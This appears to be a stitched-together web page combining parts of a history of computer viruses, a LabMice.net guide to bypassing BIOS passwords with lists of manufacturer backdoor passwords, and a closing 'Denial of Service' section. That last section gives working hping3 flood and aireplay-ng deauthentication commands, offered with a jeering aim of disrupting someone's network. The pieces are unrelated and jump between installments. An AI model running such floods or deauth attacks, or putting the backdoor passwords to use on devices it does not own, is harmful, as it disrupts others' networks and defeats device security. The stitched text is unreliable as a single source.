Internet and e-mail revolutionized communications. However, as expected, virus creators didn’t take long to realize that along with this new means of communication, an excellent way of spreading their creations far and wide had also dawned. Therefore, they quickly changed their aim from infecting a few computers while drawing as much attention to themselves as possible, to damaging as many computers as possible, as quickly as possible. This change in strategy resulted in the first global virus epidemic, which was caused by the Melissa worm.

With the appearance of Melissa, the economic impact of a virus started to become an issue. As a result, users -above all companies- started to become seriously concerned about the consequences of viruses on the security of their computers. This is how users discovered antivirus programs, which started to be installed widely. However, this also brought about a new challenge for virus writers, how to slip past this protection and how to persuade users to run infected files.

The answer to which of these virus strategies was the most effective came in the form of a new worm: Love Letter, which used a simple but effective ruse that could be considered an early type of social engineering. This strategy involves inserting false messages that trick users into thinking that the message includes anything, except a virus. This worm’s bait was simple; it led users to believe that they had received a love letter.

This technique is still the most widely used. However, it is closely followed by another tactic that has been the center of attention lately: exploiting vulnerabilities in commonly used software. This strategy offers a range of possibilities depending on the security hole exploited. The first malicious code to use this method –and quite successfully- were the BubbleBoy and Kakworm worms. These worms exploited a vulnerability in Internet Explorer by inserting HTML code in the body of the e-mail message, which allowed them to run automatically, without needing the user to do a thing.

Vulnerabilities allow many different types of actions to be carried out. For example, they allow viruses to be dropped on computers directly from the Internet -such as the Blaster worm-. In fact, the effects of the virus depend on the vulnerability that the virus author tries to exploit.



part 4


In the early days of computers, there were relatively few PCs likely to contain “sensitive” information, such as credit card numbers or other financial data, and these were generally limited to large companies that had already incorporated computers into working processes.

In any event, information stored in computers was not likely to be compromised, unless the computer was connected to a network through which the information could be transmitted. Of course, there were exceptions to this and there were cases in which hackers perpetrated frauds using data stored in IT systems. However, this was achieved through typical hacking activities, with no viruses involved.

The advent of the Internet however caused virus creators to change their objectives, and, from that moment on, they tried to infect as many computers as possible in the shortest time. Also, the introduction of Internet services -like e-banking or online shopping- brought in another change. Some virus creators started writing malicious codes not to infect computers, but, to steal confidential data associated to those services.  Evidently, to achieve this, they needed viruses that could infect many computers silently.

Their malicious labor was finally rewarded with the appearance, in 1986, of a new breed of malicious code generically called “Trojan Horse”, or simply “Trojan”. This first Trojan was called PC-Write and tried to pass itself off as the shareware version of a text processor. When run, the Trojan displayed a functional text processor on screen. The problem was that, while the user wrote, PC-Write deleted and corrupted files on the computers’ hard disk.

After PC-Write, this type of malicious code evolved very quickly to reach the stage of present-day Trojans. Today, many of the people who design Trojans to steal data cannot be considered virus writers but simply thieves who, instead of using blowtorches or dynamite have turned to viruses to commit their crimes. Ldpinch.W or the Bancos or Tolger families of Trojans are examples of this


part 5


Even though none of them can be left aside, some particular fields of computer science have played a more determinant role than others with regard to the evolution of viruses. One of the most influential fields has been the development of programming languages.

These languages are basically a means of communication with computers in order to tell them what to do. Even though each of them has its own specific development and formulation rules, computers in fact understand only one language called "machine code".

Programming languages act as an interpreter between the programmer and the computer. Obviously, the more directly you can communicate with the computer, the better it will understand you, and more complex actions you can ask it to perform.

According to this, programming languages can be divided into "low and high level" languages, depending on whether their syntax is more understandable for programmers or for computers. A "high level" language uses expressions that are easily understandable for most programmers, but not so much for computers. Visual Basic and C are good examples of this type of language.

On the contrary, expressions used by "low level" languages are closer to machine code, but are very difficult to understand for someone who has not been involved in the programming process. One of the most powerful, most widely used examples of this type of language is "assembler".

In order to explain the use of programming languages through virus history, it is necessary to refer to hardware evolution. It is not difficult to understand that an old 8-bit processor does not have the power of modern 64-bit processors, and this of course, has had an impact on the programming languages used.

In this and the next installments of this series, we will look at the different programming languages used by virus creators through computer history:

- Virus antecessors: Core Wars

As was already explained in the first chapter of this series, a group of programs called Core Wars, developed by engineers at an important telecommunications company, are considered the antecessors of current-day viruses. Computer science was still in the early stages and programming languages had hardly developed. For this reason, authors of these proto-viruses used a language that was almost equal to machine code to program them.

Curiously enough, it seems that one of the Core Wars programmers was Robert Thomas Morris, whose son programmed -years later- the "Morris worm". This malicious code became extraordinarily famous since it managed to infect 6,000 computers, an impressive figure for 1988.

- The new gurus of the 8-bits and the assembler language.

The names Altair, IMSAI and Apple in USA and Sinclair, Atari and Commodore in Europe, bring memories of times gone by, when a new generation of computer enthusiasts "fought" to establish their place in the programming world. To be the best, programmers needed to have profound knowledge of machine code and assembler, as interpreters of high-level languages used too much run time. BASIC, for example, was a relatively easy to learn language which allowed users to develop programs simply and quickly. It had however, many limitations.

This caused the appearance of two groups of programmers: those who used assembler and those who turned to high-level languages (BASIC and PASCAL, mainly).

Computer aficionados of the time enjoyed themselves more by programming useful software than malware. However, 1981 saw the birth of what can be considered the first 8-bit virus. Its name was "Elk Cloner", and was programmed in machine code. This virus could infect Apple II systems and displayed a message when it infected a computer.



part 6


Computer viruses evolve in much the same way as in other areas of IT. Two of the most important factors in understanding how viruses have reached their current level are the development of programming languages and the appearance of increasingly powerful hardware.

In 1981, almost at the same time as Elk Kloner (the first virus for 8-bit processors) made its appearance, a new operating system was growing in popularity. Its full name was Microsoft Disk Operating System, although computer buffs throughout the world would soon refer to it simply as DOS.

DOS viruses

The development of MS DOS systems occurred in parallel to the appearance of new, more powerful hardware. Personal computers were gradually establishing themselves as tools that people could use in their everyday lives, and the result was that the number of PCs users grew substantially. Perhaps inevitably, more users also started creating viruses. Gradually, we witnessed the appearance of the first viruses and Trojans for DOS, written in assembler language and demonstrating a degree of skill on the part of their authors.

Far less programmers know assembler language than are familiar with high-level languages that are far easier to learn. Malicious code written in Fortran, Basic, Cobol, C or Pascal soon began to appear. The last two languages, which are well established and very powerful, are the most widely used, particularly in their TurboC and Turbo Pascal versions. This ultimately led to the appearance of “virus families”: that is, viruses that are followed by a vast number of related viruses which are slightly modified forms of the original code.

Other users took the less ‘artistic’ approach of creating destructive viruses that did not require any great knowledge of programming. As a result, batch processing file viruses or BAT viruses began to appear.

Win16 viruses

The development of 16-bit processors led to a new era in computing. The first consequence was the birth of Windows, which, at the time, was just an application to make it easier to handle DOS using a graphic interface.

The structure of Windows 3.xx files is rather difficult to understand, and the assembler language code is very complicated, as a result of which few programmers initially attempted to develop viruses for this platform. But this problem was soon solved thanks to the development of programming tools for high-level languages, above all Visual Basic. This application is so effective that many virus creators adopted it as their ‘daily working tool’. This meant that writing a virus had become a very straightforward task, and viruses soon appeared in their hundreds. This development was accompanied by the appearance of the first Trojans able to steal passwords. As a result, more than 500 variants of the AOL Trojan family -designed to steal personal information from infected computers-  were identified.

part 7

This seventh edition on the history of computer viruses will look at how the development of Windows and Visual Basic has influenced the evolution of viruses, as with the development of these, worldwide epidemics also evolved such as the first one caused by Melissa in 1999.

While Windows changed from being an application designed to make DOS easier to manage to a 32-bit platform and operating system in its own right, virus creators went back to using assembler as the main language for programming viruses.

Versions 5 and 6 of Visual Basic (VB) were developed, making it the preferred tool, along with Borland Delphi (the Pascal development for the Windows environment), for Trojan and worm writers. Then, Visual C, a powerful environment developed in C for Windows, was adopted for creating viruses, Trojans and worms. This last type of malware gained unusual strength, taking over almost all other types of viruses. Even though the characteristics of worms have changed over time, they all have the same objective: to spread to as many computers as possible, as quickly as possible.

With time, Visual Basic became extremely popular and Microsoft implemented part of the functionality of this language as an interpreter capable of running script files with a similar syntax.

At the same time as the Win32 platform was implemented, the first script viruses also appeared: malware inside a simple text file. These demonstrated that not only executable files (.EXE and .COM files) could carry viruses. As already seen with BAT viruses, there are also other means of propagation, proving the saying "anything that can be executed directly or through a interpreter can contain malware." To be specific, the first viruses that infected the macros included in Microsoft Office emerged. As a result, Word, Excel, Access and PowerPoint become ways of spreading ‘lethal weapons’, which destroyed information when the user simply opened a document.

Melissa and self-executing worms

The powerful script interpreters in Microsoft Office allowed virus authors to arm their creations with the characteristics of worms. A clear example is Melissa, a Word macro virus with the characteristics of a worm that infects Word 97 and 2000 documents. This worm automatically sends itself out as an attachment to an e-mail message to the first 50 contacts in the Outlook address book on the affected computer. This technique, which has unfortunately become very popular nowadays, was first used in this virus which, in 1999, caused one of the largest epidemics in computer history in just a few days. In fact, companies like Microsoft, Intel or Lucent Technologies had to block their connections to the Internet due to the actions of Melissa.

The technique started by Melissa was developed in 1999 by viruses like VBS/Freelink, which unlike its predecessor sent itself out to all the contacts in the address book on the infected PC. This started a new wave of worms capable of sending themselves out to all the contacts in the Outlook address book on the infected computer. Of these, the worm that most stands out from the rest is VBS/LoveLetter, more commonly known as ‘I love You’, which emerged in May 2000 and caused an epidemic that caused damage estimated at 10,000 million euros. In order to get the user’s attention and help it to spread, this worm sent itself out in an e-mail message with the subject ‘ILOVEYOU’ and an attached file called ‘LOVE-LETTER-FOR-YOU.TXT.VBS’. When the user opened this attachment, the computer was infected.

As well as Melissa, in 1999 another type of virus emerged that also marked a milestone in virus history. In November of that year, VBS/BubbleBoy appeared, a new type of Internet worm written in VB Script. VBS/BubbleBoy was automatically run without the user needing to click on an attached file, as it exploited a vulnerability in Internet Explorer 5 to automatically run when the message was opened or viewed. This worm was followed in 2000 by JS/Kak.Worm, which spread by hiding behind Java Script in the auto-signature in Microsoft Outlook Express, allowing it to infect computers without the user needing to run an attached file. These were the first samples of a series of worms, which were joined later on by worms capable of attacking computers when the user is browsing the Internet.

How to Bypass BIOS Passwords

How to Bypass BIOS Passwords
-  LabMice.net

BIOS passwords can add an extra layer of security for desktop and laptop computers. They are used to either prevent a user from changing the BIOS settings or to prevent the PC from booting without a password. Unfortunately, BIOS passwords can also be a liability if a user forgets their password, or changes the password to intentionally lock out the corporate IT department. Sending the unit back to the manufacturer to have the BIOS reset can be expensive and is usually not covered in the warranty. Never fear, all is not lost. There are a few known backdoors and other tricks of the trade that can be used to bypass or reset the BIOS

DISCLAIMER
This article is intended for IT Professionals and systems administrators with experience servicing computer hardware. It is not intended for home users, hackers, or computer thieves attempting to crack the password on a stolen PC. Please do not attempt any of these procedures if you are unfamiliar with computer hardware, and please use this information responsibly. LabMice.net is not responsible for the use or misuse of this material, including loss of data, damage to hardware, or personal injury.


Before attempting to bypass the BIOS password on a computer, please take a minute to contact the hardware manufacturer support staff directly and ask for their recommended methods of bypassing the BIOS security. In the event the manufacturer cannot (or will not) help you, there are a number of methods that can be used to bypass or reset the BIOS password yourself. They include:

Using a manufacturers backdoor password to access the BIOS

Use password cracking software

Reset the CMOS using the jumpers or solder beads.

Removing the CMOS battery for at least 10 minutes

Overloading the keyboard buffer

Using a professional service

Please remember that most BIOS passwords do not protect the hard drive, so if you need to recover the data, simply remove the hard drive and install it in an identical system, or configure it as a slave drive in an existing system. The exception to this are laptops, especially IBM Thinkpads, which silently lock the hard drive if the supervisor password is enabled. If the supervisor password is reset without resetting the and hard drive as well, you will be unable to access the data on the drive.


--------------------------------------------------------------------------------

Backdoor passwords

Many BIOS manufacturers have provided backdoor passwords that can be used to access the BIOS setup in the event you have lost your password. These passwords are case sensitive, so you may wish to try a variety of combinations. Keep in mind that the key associated to "_" in the US keyboard corresponds to "?" in some European keyboards. Laptops typically have better BIOS security than desktop systems, and we are not aware of any backdoor passwords that will work with name brand laptops.

WARNING: Some BIOS configurations will lock you out of the system completely if you type in an incorrect password more than 3 times. Read your manufacturers documentation for the BIOS setting before you begin typing in passwords

Award BIOS backdoor passwords:

ALFAROME ALLy aLLy aLLY ALLY aPAf _award AWARD_SW AWARD?SW AWARD SW AWARD PW AWKWARD awkward BIOSTAR CONCAT CONDO Condo d8on djonet HLT J64 J256 J262 j332 j322 KDD Lkwpeter LKWPETER PINT pint SER SKY_FOX SYXZ syxz shift + syxz TTPTHA ZAAADA ZBAAACA ZJAAADC 01322222
589589 589721 595595 598598

AMI BIOS backdoor passwords:

AMI AAAMMMIII BIOS PASSWORD HEWITT RAND AMI?SW AMI_SW LKWPETER A.M.I. CONDO

PHOENIX BIOS backdoor passwords:

phoenix, PHOENIX, CMOS, BIOS

MISC. COMMON PASSWORDS

ALFAROME BIOSTAR biostar biosstar CMOS cmos LKWPETER lkwpeter setup SETUP Syxz Wodj

OTHER BIOS PASSWORDS BY MANUFACTURER

Manufacturer Password
VOBIS & IBM merlin
Dell Dell
Biostar Biostar
Compaq Compaq
Enox xo11nE
Epox central
Freetech Posterie
IWill iwill
Jetway spooml
Packard Bell bell9
QDI QDI
Siemens SKY_FOX
TMC BIGO
Toshiba Toshiba

TOSHIBA BIOS

Most Toshiba laptops and some desktop systems will bypass the BIOS password if the left shift key is held down during boot

IBM APTIVA BIOS

Press both mouse buttons repeatedly during the boot


--------------------------------------------------------------------------------

Password cracking software

The following software can be used to either crack or reset the BIOS on many chipsets. If your PC is locked with a BIOS administrator password that will not allow access to the floppy drive, these utilities may not work. Also, since these utilities do not come from the manufacturer, use them cautiously and at your own risk.

Cmos password recovery tools 3.1
!BIOS (get the how-to article)
RemPass
KILLCMOS

--------------------------------------------------------------------------------

Using the Motherboard "Clear CMOS" Jumper or Dipswitch settings

Many motherboards feature a set of jumpers or dipswitches that will clear the CMOS and wipe all of the custom settings including BIOS passwords. The locations of these jumpers / dipswitches will vary depending on the motherboard manufacturer and ideally you should always refer to the motherboard or computer manufacturers documentation. If the documentation is unavailable, the jumpers/dipswitches can sometimes be found along the edge of the motherboard, next to the CMOS battery, or near the processor. Some manufacturers may label the jumper / dipswitch CLEAR - CLEAR CMOS - CLR - CLRPWD - PASSWD - PASSWORD - PWD. On laptop computers, the dipswitches are usually found under the keyboard or within a compartment at the bottom of the laptop.
Please remember to unplug your PC and use a grounding strip before reaching into your PC and touching the motherboard. Once you locate and rest the jumper switches, turn the computer on and check if the password has been cleared. If it has, turn the computer off and return the jumpers or dipswitches to its original position.


--------------------------------------------------------------------------------

Removing the CMOS Battery

The CMOS settings on most systems are buffered by a small battery that is attached to the motherboard. (It looks like a small watch battery). If you unplug the PC and remove the battery for 10-15 minutes, the CMOS may reset itself and the password should be blank. (Along with any other machine specific settings, so be sure you are familiar with manually reconfiguring the BIOS settings before you do this.) Some manufacturers backup the power to the CMOS chipset by using a capacitor, so if your first attempt fails, leave the battery out (with the system unplugged) for at least 24 hours. Some batteries are actually soldered onto the motherboard making this task more difficult. Unsoldering the battery incorrectly may damage your motherboard and other components, so please don't attempt this if you are inexperienced. Another option may be to remove the CMOS chip from the motherboard for a period of time.
Note: Removing the battery to reset the CMOS will not work for all PC's, and almost all of the newer laptops store their BIOS passwords in a manner which does not require continuous power, so removing the CMOS battery may not work at all. IBM Thinkpad laptops lock the hard drive as well as the BIOS when the supervisor password is set. If you reset the BIOS password, but cannot reset the hard drive password, you may not be able to access the drive and it will remain locked, even if you place it in a new laptop. IBM Thinkpads have special jumper switches on the motherboard, and these should be used to reset the system.


--------------------------------------------------------------------------------

Overloading the KeyBoard Buffer

On some older computer systems, you can force the CMOS to enter its setup screen on boot by overloading the keyboard buffer. This can be done by booting with the keyboard or mouse unattached to the systems, or on some systems by hitting the ESC key over 100 times in rapid succession.


--------------------------------------------------------------------------------

Jumping the Solder Beads on the CMOS

It is also possible to reset the CMOS by connecting or "jumping" specific solder beads on the chipset. There are too many chipsets to do a breakdown of which points to jump on individual chipsets, and the location of these solder beads can vary by manufacturer, so please check your computer and motherboard documentation for details. This technique is not recommended for the inexperienced and should be only be used as a "last ditch" effort.


--------------------------------------------------------------------------------

Using a professional service

If the manufacturer of the laptop or desktop PC can't or won't reset the BIOS password, you still have the option of using a professional service. Password Crackers, Inc., offers a variety of services for desktop and laptop computers for between $100 and $400. For most of these services, you'll need to provide some type of legitimate proof of ownership. This may be difficult if you've acquired the computer second hand or from an online auction.

Denial of Service using Hping and aircrack-ng

Denial of Service on internal Network 

I am sure you will hear him say 'WTF Is this ISP!' .

1.Hping

'hping3 192.168.1.1 -i eth0 --flood -d 65000
HPING 192.168.1.1 (eth0 192.168.1.1): NO FLAGS are set, 40 headers + 65000 data bytes
hping in flood mode, no replies will be shown'

2.our beloved aircrack-ng

aireplay-ng --deauth 1000 -a (BSSID) mon0

3. Same Old mdk3

mdk3 <interface> <test_mode> [test_options]